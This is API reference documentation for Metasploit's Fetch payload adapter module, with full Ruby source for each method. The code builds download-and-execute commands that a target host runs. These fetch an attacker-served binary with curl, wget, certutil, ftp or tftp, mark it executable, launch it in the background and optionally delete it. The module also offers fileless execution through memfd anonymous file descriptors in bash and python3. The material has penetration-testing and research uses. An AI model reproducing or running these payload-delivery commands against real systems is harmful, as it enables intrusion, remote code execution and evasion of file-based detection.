Module: Msf::Payload::Adapter::Fetch

Included in:
HTTP, Https, SMB, TFTP
Defined in:
lib/msf/core/payload/adapter/fetch.rb

Defined Under Namespace

Modules: HTTP, Https, LinuxOptions, SMB, TFTP, WindowsOptions

Instance Method Summary collapse

Instance Method Details

#_check_tftp_fileObject 



169
170
171
172
173
174
175
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 169

def _check_tftp_file
  # Older Linux tftp clients do not support saving the file under a different name
  unless datastore['FETCH_WRITABLE_DIR'].blank? && datastore['FETCH_FILENAME'].blank?
    print_error('The Linux TFTP client does not support saving a file under a different name than the URI.')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_WRITABLE_DIR and FETCH_FILENAME must be blank when using the tftp client')
  end
end

#_check_tftp_portObject 



161
162
163
164
165
166
167
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 161

def _check_tftp_port
  # Most tftp clients do not have configurable ports
  if datastore['FETCH_SRVPORT'] != 69 && datastore['FetchListenerBindPort'].blank?
    print_error('The TFTP client can only connect to port 69; to start the server on a different port use FetchListenerBindPort and redirect the connection.')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_SRVPORT must be set to 69 when using the tftp client')
  end
end

#_determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s) ⇒ Object

copied from github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/socket_server.rb



178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 178

def _determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s)
  comm = nil

  case srv_comm
  when 'local'
    comm = ::Rex::Socket::Comm::Local
  when /\A-?[0-9]+\Z/
    comm = framework.sessions.get(srv_comm.to_i)
    raise("Socket Server Comm (Session #{srv_comm}) does not exist") unless comm
    raise("Socket Server Comm (Session #{srv_comm}) does not implement Rex::Socket::Comm") unless comm.is_a? ::Rex::Socket::Comm
  when nil, ''
    unless ip.nil?
      comm = Rex::Socket::SwitchBoard.best_comm(ip)
    end
  else
    raise("SocketServer Comm '#{srv_comm}' is invalid")
  end

  comm || ::Rex::Socket::Comm::Local
end

#_execute_add(get_file_cmd) ⇒ Object 



199
200
201
202
203
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 199

def _execute_add(get_file_cmd)
  return _execute_win(get_file_cmd) if windows?

  return _execute_nix(get_file_cmd)
end

#_execute_nix(get_file_cmd) ⇒ Object 



211
212
213
214
215
216
217
218
219
220
221
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 211

def _execute_nix(get_file_cmd)
  return _generate_fileless(get_file_cmd) if datastore['FETCH_FILELESS'] == 'bash'
  return _generate_fileless_python(get_file_cmd) if datastore['FETCH_FILELESS'] == 'python3.8+'


  cmds = get_file_cmd
  cmds << ";chmod +x #{_remote_destination_nix}"
  cmds << ";#{_remote_destination_nix}&"
  cmds << "sleep #{rand(3..7)};rm -rf #{_remote_destination_nix}" if datastore['FETCH_DELETE']
  cmds
end

#_execute_win(get_file_cmd) ⇒ Object 



205
206
207
208
209
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 205

def _execute_win(get_file_cmd)
  cmds = " & start /B #{_remote_destination_win}"
  cmds << " & del #{_remote_destination_win}" if datastore['FETCH_DELETE']
  get_file_cmd << cmds
end

#_generate_certutil_commandObject 



223
224
225
226
227
228
229
230
231
232
233
234
235
236
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 223

def _generate_certutil_command
  case fetch_protocol
  when 'HTTP'
    get_file_cmd = "certutil -urlcache -f http://#{download_uri} #{_remote_destination}"
  when 'HTTPS'
    # I don't think there is a way to disable cert check in certutil....
    print_error('CERTUTIL binary does not support insecure mode')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using CERTUTIL')
    get_file_cmd = "certutil -urlcache -f https://#{download_uri} #{_remote_destination}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_curl_commandObject 



270
271
272
273
274
275
276
277
278
279
280
281
282
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 270

def _generate_curl_command
  case fetch_protocol
  when 'HTTP'
    get_file_cmd = "curl -so #{_remote_destination} http://#{download_uri}"
  when 'HTTPS'
    get_file_cmd = "curl -sko #{_remote_destination} https://#{download_uri}"
  when 'TFTP'
    get_file_cmd = "curl -so #{_remote_destination} tftp://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_fileless(get_file_cmd) ⇒ Object

The idea behind fileless execution are anonymous files. The bash script will search through all processes owned by $USER and search from all file descriptor. If it will find anonymous file (contains “memfd”) with correct permissions (rwx), it will copy the payload into that descriptor with defined fetch command and finally call that descriptor



240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 240

def _generate_fileless(get_file_cmd)
  # get list of all $USER's processes
  cmd = 'FOUND=0'
  cmd << ";for i in $(ps -u $USER | awk '{print $1}')"
  # already found anonymous file where we can write
  cmd << '; do if [ $FOUND -eq 0 ]'

  # look for every symbolic link with write rwx permissions
  # if found one, try to download payload into the anonymous file
  # and execute it
  cmd << '; then for f in $(find /proc/$i/fd -type l -perm u=rwx 2>/dev/null)'
  cmd << '; do if [ $(ls -al $f | grep -o "memfd" >/dev/null; echo $?) -eq "0" ]'
  cmd << "; then if $(#{get_file_cmd} >/dev/null)"
  cmd << '; then $f'
  cmd << '; FOUND=1'
  cmd << '; break'
  cmd << '; fi'
  cmd << '; fi'
  cmd << '; done'
  cmd << '; fi'
  cmd << '; done'

  cmd
end

#_generate_fileless_python(get_file_cmd) ⇒ Object

same idea as _generate_fileless function, but force creating anonymous file handle



266
267
268
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 266

def _generate_fileless_python(get_file_cmd)
  %Q<python3 -c 'import os;fd=os.memfd_create("",os.MFD_CLOEXEC);os.system(f"f=\\"/proc/{os.getpid()}/fd/{fd}\\";#{get_file_cmd};$f&")'> 
end

#_generate_ftp_commandObject 



284
285
286
287
288
289
290
291
292
293
294
295
296
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 284

def _generate_ftp_command
  case fetch_protocol
  when 'FTP'
    get_file_cmd = "ftp -Vo #{_remote_destination_nix} ftp://#{download_uri}"
  when 'HTTP'
    get_file_cmd = "ftp -Vo #{_remote_destination_nix} http://#{download_uri}"
  when 'HTTPS'
    get_file_cmd = "ftp -Vo #{_remote_destination_nix} https://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_tftp_commandObject 



298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 298

def _generate_tftp_command
  _check_tftp_port
  case fetch_protocol
  when 'TFTP'
    if windows?
      fetch_command = _execute_win("tftp -i #{srvhost} GET #{srvuri} #{_remote_destination}")
    else
      _check_tftp_file
      if datastore['FETCH_FILELESS'] != 'none' && linux?
        return _generate_fileless("(echo binary ; echo get #{srvuri} $f ) | tftp #{srvhost}")
      else
        fetch_command = "(echo binary ; echo get #{srvuri} ) | tftp #{srvhost}; chmod +x ./#{srvuri}; ./#{srvuri} &"
      end
    end
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  fetch_command
end

#_generate_tnftp_commandObject 



318
319
320
321
322
323
324
325
326
327
328
329
330
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 318

def _generate_tnftp_command
  case fetch_protocol
  when 'FTP'
    get_file_cmd = "tnftp -Vo #{_remote_destination_nix} ftp://#{download_uri}"
  when 'HTTP'
    get_file_cmd = "tnftp -Vo #{_remote_destination_nix} http://#{download_uri}"
  when 'HTTPS'
    get_file_cmd = "tnftp -Vo #{_remote_destination_nix} https://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_wget_commandObject 



332
333
334
335
336
337
338
339
340
341
342
343
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 332

def _generate_wget_command
  case fetch_protocol
  when 'HTTPS'
    get_file_cmd = "wget -qO #{_remote_destination} --no-check-certificate https://#{download_uri}"
  when 'HTTP'
    get_file_cmd = "wget -qO #{_remote_destination} http://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end

  _execute_add(get_file_cmd)
end

#_remote_destinationObject 



345
346
347
348
349
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 345

def _remote_destination
  return _remote_destination_win if windows?

  return _remote_destination_nix
end

#_remote_destination_nixObject 



351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 351

def _remote_destination_nix
  return @remote_destination_nix unless @remote_destination_nix.nil?

  if datastore['FETCH_FILELESS'] != 'none'
    @remote_destination_nix = '$f'
    return @remote_destination_nix
  end
  writable_dir = datastore['FETCH_WRITABLE_DIR']
  writable_dir = '.' if writable_dir.blank?
  writable_dir += '/' unless writable_dir[-1] == '/'
  payload_filename = datastore['FETCH_FILENAME']
  payload_filename = srvuri if payload_filename.blank?
  payload_path = writable_dir + payload_filename
  @remote_destination_nix = payload_path
  @remote_destination_nix
end

#_remote_destination_winObject 



368
369
370
371
372
373
374
375
376
377
378
379
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 368

def _remote_destination_win
  return @remote_destination_win unless @remote_destination_win.nil?

  writable_dir = datastore['FETCH_WRITABLE_DIR']
  writable_dir += '\\' unless writable_dir.blank? || writable_dir[-1] == '\\'
  payload_filename = datastore['FETCH_FILENAME']
  payload_filename = srvuri if payload_filename.blank?
  payload_path = writable_dir + payload_filename
  payload_path += '.exe' unless payload_path[-4..] == '.exe'
  @remote_destination_win = payload_path
  @remote_destination_win
end

#default_srvuriObject

If no fetch URL is provided, we generate one based off the underlying payload data This is because if we use a randomly-generated URI, the URI generated by venom and Framework will not match. This way, we can build a payload in venom and a listener in Framework, and if the underlying payload type/host/port are the same, the URI will be, too.



35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 35

def default_srvuri
  # If we're in framework, payload is in datastore; msfvenom has it in refname
  payload_name = datastore['payload'] ||= refname
  decoded_uri = payload_name.dup
  # there may be no transport, so leave the connection string off if that's the case
  netloc = ''
  if module_info['ConnectionType'].upcase == 'REVERSE' || module_info['ConnectionType'].upcase == 'TUNNEL'
    netloc << datastore['LHOST'] unless datastore['LHOST'].blank?
    unless datastore['LPORT'].blank?
      if Rex::Socket.is_ipv6?(netloc)
        netloc = "[#{netloc}]:#{datastore['LPORT']}"
      else
        netloc = "#{netloc}:#{datastore['LPORT']}"
      end
    end
  elsif module_info['ConnectionType'].upcase == 'BIND'
    netloc << datastore['LHOST'] unless datastore['LHOST'].blank?
    unless datastore['RPORT'].blank?
      if Rex::Socket.is_ipv6?(netloc)
        netloc = "[#{netloc}]:#{datastore['RPORT']}"
      else
        netloc = "#{netloc}:#{datastore['RPORT']}"
      end
    end
  end
  decoded_uri << ";#{netloc}"
  Base64.urlsafe_encode64(OpenSSL::Digest::MD5.new(decoded_uri).digest, padding: false)
end

#download_uriObject 



64
65
66
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 64

def download_uri
  "#{srvnetloc}/#{srvuri}"
end

#fetch_bindhostObject 



68
69
70
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 68

def fetch_bindhost
  datastore['FetchListenerBindAddress'].blank? ? srvhost : datastore['FetchListenerBindAddress']
end

#fetch_bindnetlocObject 



76
77
78
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 76

def fetch_bindnetloc
  Rex::Socket.to_authority(fetch_bindhost, fetch_bindport)
end

#fetch_bindportObject 



72
73
74
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 72

def fetch_bindport
  datastore['FetchListenerBindPort'].blank? ? srvport : datastore['FetchListenerBindPort']
end

#generate(opts = {}) ⇒ Object 



80
81
82
83
84
85
86
87
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 80

def generate(opts = {})
  opts[:arch] ||= module_info['AdaptedArch']
  opts[:code] = super
  @srvexe = generate_payload_exe(opts)
  cmd = generate_fetch_commands
  vprint_status("Command to run on remote host: #{cmd}")
  cmd
end

#generate_fetch_commandsObject 



89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 89

def generate_fetch_commands
  # TODO: Make a check method that determines if we support a platform/server/command combination
  #
  case datastore['FETCH_COMMAND'].upcase
  when 'FTP'
    return _generate_ftp_command
  when 'TNFTP'
    return _generate_tnftp_command
  when 'WGET'
    return _generate_wget_command
  when 'CURL'
    return _generate_curl_command
  when 'TFTP'
    return _generate_tftp_command
  when 'CERTUTIL'
    return _generate_certutil_command
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
end

#generate_payload_uuid(conf = {}) ⇒ Object 



115
116
117
118
119
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 115

def generate_payload_uuid(conf = {})
  conf[:arch] ||= module_info['AdaptedArch']
  conf[:platform] ||= module_info['AdaptedPlatform']
  super
end

#generate_stage(opts = {}) ⇒ Object 



110
111
112
113
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 110

def generate_stage(opts = {})
  opts[:arch] ||= module_info['AdaptedArch']
  super
end

#handle_connection(conn, opts = {}) ⇒ Object 



121
122
123
124
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 121

def handle_connection(conn, opts = {})
  opts[:arch] ||= module_info['AdaptedArch']
  super
end

#initialize(*args) ⇒ Object 



2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 2

def initialize(*args)
  super
  register_options(
    [
      Msf::OptBool.new('FETCH_DELETE', [true, 'Attempt to delete the binary after execution', false]),
      Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
      # FETCH_SRVHOST defaults to LHOST, but if the payload doesn't connect back to Metasploit (e.g. adduser, messagebox, etc.) then FETCH_SRVHOST needs to be set
      Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ !options['LHOST']&.required, 'Local IP to use for serving payload']),
      Msf::OptString.new('FETCH_URIPATH', [ false, 'Local URI to use for serving payload', '']),
    ]
  )
  register_advanced_options(
    [
      Msf::OptAddress.new('FetchListenerBindAddress', [ false, 'The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST']),
      Msf::OptPort.new('FetchListenerBindPort', [false, 'The port to bind to if different from FETCH_SRVPORT']),
      Msf::OptBool.new('FetchHandlerDisable', [true, 'Disable fetch handler', false])
    ]
  )
  @delete_resource = true
  @fetch_service = nil
  @myresources = []
  @srvexe = ''
  @remote_destination_win = nil
  @remote_destination_nix = nil
  @windows = nil
end

#linux?Boolean

Returns:

  • (Boolean) 


154
155
156
157
158
159
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 154

def linux?
  return @linux unless @linux.nil?

  @linux = platform.platforms.first == Msf::Module::Platform::Linux
  @linux
end

#srvhostObject 



126
127
128
129
130
131
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 126

def srvhost
  host = datastore['FETCH_SRVHOST']
  host = datastore['LHOST'] if host.blank?
  host = '127.127.127.127' if host.blank?
  host
end

#srvnetlocObject 



133
134
135
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 133

def srvnetloc
  Rex::Socket.to_authority(srvhost, srvport)
end

#srvportObject 



137
138
139
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 137

def srvport
  datastore['FETCH_SRVPORT']
end

#srvuriObject 



141
142
143
144
145
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 141

def srvuri
  return datastore['FETCH_URIPATH'] unless datastore['FETCH_URIPATH'].blank?

  default_srvuri
end

#windows?Boolean

Returns:

  • (Boolean) 


147
148
149
150
151
152
 
# File 'lib/msf/core/payload/adapter/fetch.rb', line 147

def windows?
  return @windows unless @windows.nil?

  @windows = platform.platforms.first == Msf::Module::Platform::Windows
  @windows
end